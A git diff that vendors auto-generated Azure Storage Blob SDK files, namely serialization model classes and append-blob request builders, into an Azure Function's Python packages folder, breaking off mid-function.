{'required': True}, + } + + _attribute_map = { + 'id': {'key': 'Id', 'type': 'str'}, + 'access_policy': {'key': 'AccessPolicy', 'type': 'AccessPolicy'}, + } + _xml_map = { + 'name': 'SignedIdentifier' + } + + def __init__( + self, + *, + id: str, + access_policy: Optional["AccessPolicy"] = None, + **kwargs + ): + """ + :keyword id: Required. a unique id. + :paramtype id: str + :keyword access_policy: An Access policy. + :paramtype access_policy: ~azure.storage.blob.models.AccessPolicy + """ + super(SignedIdentifier, self).__init__(**kwargs) + self.id = id + self.access_policy = access_policy + + +class SourceModifiedAccessConditions(msrest.serialization.Model): + """Parameter group. + + :ivar source_if_modified_since: Specify this header value to operate only on a blob if it has + been modified since the specified date/time. + :vartype source_if_modified_since: ~datetime.datetime + :ivar source_if_unmodified_since: Specify this header value to operate only on a blob if it has + not been modified since the specified date/time. + :vartype source_if_unmodified_since: ~datetime.datetime + :ivar source_if_match: Specify an ETag value to operate only on blobs with a matching value. + :vartype source_if_match: str + :ivar source_if_none_match: Specify an ETag value to operate only on blobs without a matching + value. + :vartype source_if_none_match: str + :ivar source_if_tags: Specify a SQL where clause on blob tags to operate only on blobs with a + matching value. + :vartype source_if_tags: str + """ + + _attribute_map = { + 'source_if_modified_since': {'key': 'sourceIfModifiedSince', 'type': 'rfc-1123'}, + 'source_if_unmodified_since': {'key': 'sourceIfUnmodifiedSince', 'type': 'rfc-1123'}, + 'source_if_match': {'key': 'sourceIfMatch', 'type': 'str'}, + 'source_if_none_match': {'key': 'sourceIfNoneMatch', 'type': 'str'}, + 'source_if_tags': {'key': 'sourceIfTags', 'type': 'str'}, + } + + def __init__( + self, + *, + source_if_modified_since: Optional[datetime.datetime] = None, + source_if_unmodified_since: Optional[datetime.datetime] = None, + source_if_match: Optional[str] = None, + source_if_none_match: Optional[str] = None, + source_if_tags: Optional[str] = None, + **kwargs + ): + """ + :keyword source_if_modified_since: Specify this header value to operate only on a blob if it + has been modified since the specified date/time. + :paramtype source_if_modified_since: ~datetime.datetime + :keyword source_if_unmodified_since: Specify this header value to operate only on a blob if it + has not been modified since the specified date/time. + :paramtype source_if_unmodified_since: ~datetime.datetime + :keyword source_if_match: Specify an ETag value to operate only on blobs with a matching value. + :paramtype source_if_match: str + :keyword source_if_none_match: Specify an ETag value to operate only on blobs without a + matching value. + :paramtype source_if_none_match: str + :keyword source_if_tags: Specify a SQL where clause on blob tags to operate only on blobs with + a matching value. + :paramtype source_if_tags: str + """ + super(SourceModifiedAccessConditions, self).__init__(**kwargs) + self.source_if_modified_since = source_if_modified_since + self.source_if_unmodified_since = source_if_unmodified_since + self.source_if_match = source_if_match + self.source_if_none_match = source_if_none_match + self.source_if_tags = source_if_tags + + +class StaticWebsite(msrest.serialization.Model): + """The properties that enable an account to host a static website. + + All required parameters must be populated in order to send to Azure. + + :ivar enabled: Required. Indicates whether this account is hosting a static website. + :vartype enabled: bool + :ivar index_document: The default name of the index page under each directory. + :vartype index_document: str + :ivar error_document404_path: The absolute path of the custom 404 page. + :vartype error_document404_path: str + :ivar default_index_document_path: Absolute path of the default index page. + :vartype default_index_document_path: str + """ + + _validation = { + 'enabled': {'required': True}, + } + + _attribute_map = { + 'enabled': {'key': 'Enabled', 'type': 'bool'}, + 'index_document': {'key': 'IndexDocument', 'type': 'str'}, + 'error_document404_path': {'key': 'ErrorDocument404Path', 'type': 'str'}, + 'default_index_document_path': {'key': 'DefaultIndexDocumentPath', 'type': 'str'}, + } + + def __init__( + self, + *, + enabled: bool, + index_document: Optional[str] = None, + error_document404_path: Optional[str] = None, + default_index_document_path: Optional[str] = None, + **kwargs + ): + """ + :keyword enabled: Required. Indicates whether this account is hosting a static website. + :paramtype enabled: bool + :keyword index_document: The default name of the index page under each directory. + :paramtype index_document: str + :keyword error_document404_path: The absolute path of the custom 404 page. + :paramtype error_document404_path: str + :keyword default_index_document_path: Absolute path of the default index page. + :paramtype default_index_document_path: str + """ + super(StaticWebsite, self).__init__(**kwargs) + self.enabled = enabled + self.index_document = index_document + self.error_document404_path = error_document404_path + self.default_index_document_path = default_index_document_path + + +class StorageError(msrest.serialization.Model): + """StorageError. + + :ivar message: + :vartype message: str + """ + + _attribute_map = { + 'message': {'key': 'Message', 'type': 'str'}, + } + + def __init__( + self, + *, + message: Optional[str] = None, + **kwargs + ): + """ + :keyword message: + :paramtype message: str + """ + super(StorageError, self).__init__(**kwargs) + self.message = message + + +class StorageServiceProperties(msrest.serialization.Model): + """Storage Service Properties. + + :ivar logging: Azure Analytics Logging settings. + :vartype logging: ~azure.storage.blob.models.Logging + :ivar hour_metrics: a summary of request statistics grouped by API in hour or minute aggregates + for blobs. + :vartype hour_metrics: ~azure.storage.blob.models.Metrics + :ivar minute_metrics: a summary of request statistics grouped by API in hour or minute + aggregates for blobs. + :vartype minute_metrics: ~azure.storage.blob.models.Metrics + :ivar cors: The set of CORS rules. + :vartype cors: list[~azure.storage.blob.models.CorsRule] + :ivar default_service_version: The default version to use for requests to the Blob service if + an incoming request's version is not specified. Possible values include version 2008-10-27 and + all more recent versions. + :vartype default_service_version: str + :ivar delete_retention_policy: the retention policy which determines how long the associated + data should persist. + :vartype delete_retention_policy: ~azure.storage.blob.models.RetentionPolicy + :ivar static_website: The properties that enable an account to host a static website. + :vartype static_website: ~azure.storage.blob.models.StaticWebsite + """ + + _attribute_map = { + 'logging': {'key': 'Logging', 'type': 'Logging'}, + 'hour_metrics': {'key': 'HourMetrics', 'type': 'Metrics'}, + 'minute_metrics': {'key': 'MinuteMetrics', 'type': 'Metrics'}, + 'cors': {'key': 'Cors', 'type': '[CorsRule]', 'xml': {'wrapped': True}}, + 'default_service_version': {'key': 'DefaultServiceVersion', 'type': 'str'}, + 'delete_retention_policy': {'key': 'DeleteRetentionPolicy', 'type': 'RetentionPolicy'}, + 'static_website': {'key': 'StaticWebsite', 'type': 'StaticWebsite'}, + } + + def __init__( + self, + *, + logging: Optional["Logging"] = None, + hour_metrics: Optional["Metrics"] = None, + minute_metrics: Optional["Metrics"] = None, + cors: Optional[List["CorsRule"]] = None, + default_service_version: Optional[str] = None, + delete_retention_policy: Optional["RetentionPolicy"] = None, + static_website: Optional["StaticWebsite"] = None, + **kwargs + ): + """ + :keyword logging: Azure Analytics Logging settings. + :paramtype logging: ~azure.storage.blob.models.Logging + :keyword hour_metrics: a summary of request statistics grouped by API in hour or minute + aggregates for blobs. + :paramtype hour_metrics: ~azure.storage.blob.models.Metrics + :keyword minute_metrics: a summary of request statistics grouped by API in hour or minute + aggregates for blobs. + :paramtype minute_metrics: ~azure.storage.blob.models.Metrics + :keyword cors: The set of CORS rules. + :paramtype cors: list[~azure.storage.blob.models.CorsRule] + :keyword default_service_version: The default version to use for requests to the Blob service + if an incoming request's version is not specified. Possible values include version 2008-10-27 + and all more recent versions. + :paramtype default_service_version: str + :keyword delete_retention_policy: the retention policy which determines how long the associated + data should persist. + :paramtype delete_retention_policy: ~azure.storage.blob.models.RetentionPolicy + :keyword static_website: The properties that enable an account to host a static website. + :paramtype static_website: ~azure.storage.blob.models.StaticWebsite + """ + super(StorageServiceProperties, self).__init__(**kwargs) + self.logging = logging + self.hour_metrics = hour_metrics + self.minute_metrics = minute_metrics + self.cors = cors + self.default_service_version = default_service_version + self.delete_retention_policy = delete_retention_policy + self.static_website = static_website + + +class StorageServiceStats(msrest.serialization.Model): + """Stats for the storage service. + + :ivar geo_replication: Geo-Replication information for the Secondary Storage Service. + :vartype geo_replication: ~azure.storage.blob.models.GeoReplication + """ + + _attribute_map = { + 'geo_replication': {'key': 'GeoReplication', 'type': 'GeoReplication'}, + } + + def __init__( + self, + *, + geo_replication: Optional["GeoReplication"] = None, + **kwargs + ): + """ + :keyword geo_replication: Geo-Replication information for the Secondary Storage Service. + :paramtype geo_replication: ~azure.storage.blob.models.GeoReplication + """ + super(StorageServiceStats, self).__init__(**kwargs) + self.geo_replication = geo_replication + + +class UserDelegationKey(msrest.serialization.Model): + """A user delegation key. + + All required parameters must be populated in order to send to Azure. + + :ivar signed_oid: Required. The Azure Active Directory object ID in GUID format. + :vartype signed_oid: str + :ivar signed_tid: Required. The Azure Active Directory tenant ID in GUID format. + :vartype signed_tid: str + :ivar signed_start: Required. The date-time the key is active. + :vartype signed_start: ~datetime.datetime + :ivar signed_expiry: Required. The date-time the key expires. + :vartype signed_expiry: ~datetime.datetime + :ivar signed_service: Required. Abbreviation of the Azure Storage service that accepts the key. + :vartype signed_service: str + :ivar signed_version: Required. The service version that created the key. + :vartype signed_version: str + :ivar value: Required. The key as a base64 string. + :vartype value: str + """ + + _validation = { + 'signed_oid': {'required': True}, + 'signed_tid': {'required': True}, + 'signed_start': {'required': True}, + 'signed_expiry': {'required': True}, + 'signed_service': {'required': True}, + 'signed_version': {'required': True}, + 'value': {'required': True}, + } + + _attribute_map = { + 'signed_oid': {'key': 'SignedOid', 'type': 'str'}, + 'signed_tid': {'key': 'SignedTid', 'type': 'str'}, + 'signed_start': {'key': 'SignedStart', 'type': 'iso-8601'}, + 'signed_expiry': {'key': 'SignedExpiry', 'type': 'iso-8601'}, + 'signed_service': {'key': 'SignedService', 'type': 'str'}, + 'signed_version': {'key': 'SignedVersion', 'type': 'str'}, + 'value': {'key': 'Value', 'type': 'str'}, + } + + def __init__( + self, + *, + signed_oid: str, + signed_tid: str, + signed_start: datetime.datetime, + signed_expiry: datetime.datetime, + signed_service: str, + signed_version: str, + value: str, + **kwargs + ): + """ + :keyword signed_oid: Required. The Azure Active Directory object ID in GUID format. + :paramtype signed_oid: str + :keyword signed_tid: Required. The Azure Active Directory tenant ID in GUID format. + :paramtype signed_tid: str + :keyword signed_start: Required. The date-time the key is active. + :paramtype signed_start: ~datetime.datetime + :keyword signed_expiry: Required. The date-time the key expires. + :paramtype signed_expiry: ~datetime.datetime + :keyword signed_service: Required. Abbreviation of the Azure Storage service that accepts the + key. + :paramtype signed_service: str + :keyword signed_version: Required. The service version that created the key. + :paramtype signed_version: str + :keyword value: Required. The key as a base64 string. + :paramtype value: str + """ + super(UserDelegationKey, self).__init__(**kwargs) + self.signed_oid = signed_oid + self.signed_tid = signed_tid + self.signed_start = signed_start + self.signed_expiry = signed_expiry + self.signed_service = signed_service + self.signed_version = signed_version + self.value = value diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/__init__.py new file mode 100644 index 0000000..dfe59c6 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/__init__.py @@ -0,0 +1,23 @@ +# coding=utf-8 +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for license information. +# Code generated by Microsoft (R) AutoRest Code Generator. +# Changes may cause incorrect behavior and will be lost if the code is regenerated. +# -------------------------------------------------------------------------- + +from ._service_operations import ServiceOperations +from ._container_operations import ContainerOperations +from ._blob_operations import BlobOperations +from ._page_blob_operations import PageBlobOperations +from ._append_blob_operations import AppendBlobOperations +from ._block_blob_operations import BlockBlobOperations + +__all__ = [ + 'ServiceOperations', + 'ContainerOperations', + 'BlobOperations', + 'PageBlobOperations', + 'AppendBlobOperations', + 'BlockBlobOperations', +] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..2daf6c2 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/__pycache__/_append_blob_operations.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/__pycache__/_append_blob_operations.cpython-39.pyc new file mode 100644 index 0000000..d504c2d Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/__pycache__/_append_blob_operations.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/__pycache__/_blob_operations.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/__pycache__/_blob_operations.cpython-39.pyc new file mode 100644 index 0000000..5b7e846 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/__pycache__/_blob_operations.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/__pycache__/_block_blob_operations.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/__pycache__/_block_blob_operations.cpython-39.pyc new file mode 100644 index 0000000..bd278a5 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/__pycache__/_block_blob_operations.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/__pycache__/_container_operations.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/__pycache__/_container_operations.cpython-39.pyc new file mode 100644 index 0000000..521f02d Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/__pycache__/_container_operations.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/__pycache__/_page_blob_operations.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/__pycache__/_page_blob_operations.cpython-39.pyc new file mode 100644 index 0000000..5cc9100 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/__pycache__/_page_blob_operations.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/__pycache__/_service_operations.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/__pycache__/_service_operations.cpython-39.pyc new file mode 100644 index 0000000..855a482 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/__pycache__/_service_operations.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/_append_blob_operations.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/_append_blob_operations.py new file mode 100644 index 0000000..8c09a92 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/_append_blob_operations.py @@ -0,0 +1,1051 @@ +# pylint: disable=too-many-lines +# coding=utf-8 +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for license information. +# Code generated by Microsoft (R) AutoRest Code Generator. +# Changes may cause incorrect behavior and will be lost if the code is regenerated. +# -------------------------------------------------------------------------- +import datetime +from typing import TYPE_CHECKING + +from msrest import Serializer + +from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error +from azure.core.pipeline import PipelineResponse +from azure.core.pipeline.transport import HttpResponse +from azure.core.rest import HttpRequest +from azure.core.tracing.decorator import distributed_trace + +from .. import models as _models +from .._vendor import _convert_request, _format_url_section + +if TYPE_CHECKING: + # pylint: disable=unused-import,ungrouped-imports + from typing import Any, Callable, Dict, IO, Optional, TypeVar, Union + T = TypeVar('T') + ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]] + +_SERIALIZER = Serializer() +_SERIALIZER.client_side_validation = False +# fmt: off + +def build_create_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + blob_type = kwargs.pop('blob_type', "AppendBlob") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + content_length = kwargs.pop('content_length') # type: int + timeout = kwargs.pop('timeout', None) # type: Optional[int] + blob_content_type = kwargs.pop('blob_content_type', None) # type: Optional[str] + blob_content_encoding = kwargs.pop('blob_content_encoding', None) # type: Optional[str] + blob_content_language = kwargs.pop('blob_content_language', None) # type: Optional[str] + blob_content_md5 = kwargs.pop('blob_content_md5', None) # type: Optional[bytearray] + blob_cache_control = kwargs.pop('blob_cache_control', None) # type: Optional[str] + metadata = kwargs.pop('metadata', None) # type: Optional[Dict[str, str]] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + blob_content_disposition = kwargs.pop('blob_content_disposition', None) # type: Optional[str] + encryption_key = kwargs.pop('encryption_key', None) # type: Optional[str] + encryption_key_sha256 = kwargs.pop('encryption_key_sha256', None) # type: Optional[str] + encryption_algorithm = kwargs.pop('encryption_algorithm', None) # type: Optional[Union[str, "_models.EncryptionAlgorithmType"]] + encryption_scope = kwargs.pop('encryption_scope', None) # type: Optional[str] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + if_match = kwargs.pop('if_match', None) # type: Optional[str] + if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + blob_tags_string = kwargs.pop('blob_tags_string', None) # type: Optional[str] + immutability_policy_expiry = kwargs.pop('immutability_policy_expiry', None) # type: Optional[datetime.datetime] + immutability_policy_mode = kwargs.pop('immutability_policy_mode', None) # type: Optional[Union[str, "_models.BlobImmutabilityPolicyMode"]] + legal_hold = kwargs.pop('legal_hold', None) # type: Optional[bool] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-blob-type'] = _SERIALIZER.header("blob_type", blob_type, 'str') + _header_parameters['Content-Length'] = _SERIALIZER.header("content_length", content_length, 'long') + if blob_content_type is not None: + _header_parameters['x-ms-blob-content-type'] = _SERIALIZER.header("blob_content_type", blob_content_type, 'str') + if blob_content_encoding is not None: + _header_parameters['x-ms-blob-content-encoding'] = _SERIALIZER.header("blob_content_encoding", blob_content_encoding, 'str') + if blob_content_language is not None: + _header_parameters['x-ms-blob-content-language'] = _SERIALIZER.header("blob_content_language", blob_content_language, 'str') + if blob_content_md5 is not None: + _header_parameters['x-ms-blob-content-md5'] = _SERIALIZER.header("blob_content_md5", blob_content_md5, 'bytearray') + if blob_cache_control is not None: + _header_parameters['x-ms-blob-cache-control'] = _SERIALIZER.header("blob_cache_control", blob_cache_control, 'str') + if metadata is not None: + _header_parameters['x-ms-meta'] = _SERIALIZER.header("metadata", metadata, '{str}') + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if blob_content_disposition is not None: + _header_parameters['x-ms-blob-content-disposition'] = _SERIALIZER.header("blob_content_disposition", blob_content_disposition, 'str') + if encryption_key is not None: + _header_parameters['x-ms-encryption-key'] = _SERIALIZER.header("encryption_key", encryption_key, 'str') + if encryption_key_sha256 is not None: + _header_parameters['x-ms-encryption-key-sha256'] = _SERIALIZER.header("encryption_key_sha256", encryption_key_sha256, 'str') + if encryption_algorithm is not None: + _header_parameters['x-ms-encryption-algorithm'] = _SERIALIZER.header("encryption_algorithm", encryption_algorithm, 'str') + if encryption_scope is not None: + _header_parameters['x-ms-encryption-scope'] = _SERIALIZER.header("encryption_scope", encryption_scope, 'str') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + _header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str') + if if_none_match is not None: + _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + if blob_tags_string is not None: + _header_parameters['x-ms-tags'] = _SERIALIZER.header("blob_tags_string", blob_tags_string, 'str') + if immutability_policy_expiry is not None: + _header_parameters['x-ms-immutability-policy-until-date'] = _SERIALIZER.header("immutability_policy_expiry", immutability_policy_expiry, 'rfc-1123') + if immutability_policy_mode is not None: + _header_parameters['x-ms-immutability-policy-mode'] = _SERIALIZER.header("immutability_policy_mode", immutability_policy_mode, 'str') + if legal_hold is not None: + _header_parameters['x-ms-legal-hold'] = _SERIALIZER.header("legal_hold", legal_hold, 'bool') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_append_block_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + comp = kwargs.pop('comp', "appendblock") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + content_type = kwargs.pop('content_type', None) # type: Optional[str] + content_length = kwargs.pop('content_length') # type: int + timeout = kwargs.pop('timeout', None) # type: Optional[int] + transactional_content_md5 = kwargs.pop('transactional_content_md5', None) # type: Optional[bytearray] + transactional_content_crc64 = kwargs.pop('transactional_content_crc64', None) # type: Optional[bytearray] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + max_size = kwargs.pop('max_size', None) # type: Optional[int] + append_position = kwargs.pop('append_position', None) # type: Optional[int] + encryption_key = kwargs.pop('encryption_key', None) # type: Optional[str] + encryption_key_sha256 = kwargs.pop('encryption_key_sha256', None) # type: Optional[str] + encryption_algorithm = kwargs.pop('encryption_algorithm', None) # type: Optional[Union[str, "_models.EncryptionAlgorithmType"]] + encryption_scope = kwargs.pop('encryption_scope', None) # type: Optional[str] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + if_match = kwargs.pop('if_match', None) # type: Optional[str] + if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['Content-Length'] = _SERIALIZER.header("content_length", content_length, 'long') + if transactional_content_md5 is not None: + _header_parameters['Content-MD5'] = _SERIALIZER.header("transactional_content_md5", transactional_content_md5, 'bytearray') + if transactional_content_crc64 is not None: + _header_parameters['x-ms-content-crc64'] = _SERIALIZER.header("transactional_content_crc64", transactional_content_crc64, 'bytearray') + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if max_size is not None: + _header_parameters['x-ms-blob-condition-maxsize'] = _SERIALIZER.header("max_size", max_size, 'long') + if append_position is not None: + _header_parameters['x-ms-blob-condition-appendpos'] = _SERIALIZER.header("append_position", append_position, 'long') + if encryption_key is not None: + _header_parameters['x-ms-encryption-key'] = _SERIALIZER.header("encryption_key", encryption_key, 'str') + if encryption_key_sha256 is not None: + _header_parameters['x-ms-encryption-key-sha256'] = _SERIALIZER.header("encryption_key_sha256", encryption_key_sha256, 'str') + if encryption_algorithm is not None: + _header_parameters['x-ms-encryption-algorithm'] = _SERIALIZER.header("encryption_algorithm", encryption_algorithm, 'str') + if encryption_scope is not None: + _header_parameters['x-ms-encryption-scope'] = _SERIALIZER.header("encryption_scope", encryption_scope, 'str') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + _header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str') + if if_none_match is not None: + _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + if content_type is not None: + _header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_append_block_from_url_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + comp = kwargs.pop('comp', "appendblock") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + source_url = kwargs.pop('source_url') # type: str + content_length = kwargs.pop('content_length') # type: int + source_range = kwargs.pop('source_range', None) # type: Optional[str] + source_content_md5 = kwargs.pop('source_content_md5', None) # type: Optional[bytearray] + source_contentcrc64 = kwargs.pop('source_contentcrc64', None) # type: Optional[bytearray] + timeout = kwargs.pop('timeout', None) # type: Optional[int] + transactional_content_md5 = kwargs.pop('transactional_content_md5', None) # type: Optional[bytearray] + encryption_key = kwargs.pop('encryption_key', None) # type: Optional[str] + encryption_key_sha256 = kwargs.pop('encryption_key_sha256', None) # type: Optional[str] + encryption_algorithm = kwargs.pop('encryption_algorithm', None) # type: Optional[Union[str, "_models.EncryptionAlgorithmType"]] + encryption_scope = kwargs.pop('encryption_scope', None) # type: Optional[str] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + max_size = kwargs.pop('max_size', None) # type: Optional[int] + append_position = kwargs.pop('append_position', None) # type: Optional[int] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + if_match = kwargs.pop('if_match', None) # type: Optional[str] + if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + source_if_modified_since = kwargs.pop('source_if_modified_since', None) # type: Optional[datetime.datetime] + source_if_unmodified_since = kwargs.pop('source_if_unmodified_since', None) # type: Optional[datetime.datetime] + source_if_match = kwargs.pop('source_if_match', None) # type: Optional[str] + source_if_none_match = kwargs.pop('source_if_none_match', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + copy_source_authorization = kwargs.pop('copy_source_authorization', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-copy-source'] = _SERIALIZER.header("source_url", source_url, 'str') + if source_range is not None: + _header_parameters['x-ms-source-range'] = _SERIALIZER.header("source_range", source_range, 'str') + if source_content_md5 is not None: + _header_parameters['x-ms-source-content-md5'] = _SERIALIZER.header("source_content_md5", source_content_md5, 'bytearray') + if source_contentcrc64 is not None: + _header_parameters['x-ms-source-content-crc64'] = _SERIALIZER.header("source_contentcrc64", source_contentcrc64, 'bytearray') + _header_parameters['Content-Length'] = _SERIALIZER.header("content_length", content_length, 'long') + if transactional_content_md5 is not None: + _header_parameters['Content-MD5'] = _SERIALIZER.header("transactional_content_md5", transactional_content_md5, 'bytearray') + if encryption_key is not None: + _header_parameters['x-ms-encryption-key'] = _SERIALIZER.header("encryption_key", encryption_key, 'str') + if encryption_key_sha256 is not None: + _header_parameters['x-ms-encryption-key-sha256'] = _SERIALIZER.header("encryption_key_sha256", encryption_key_sha256, 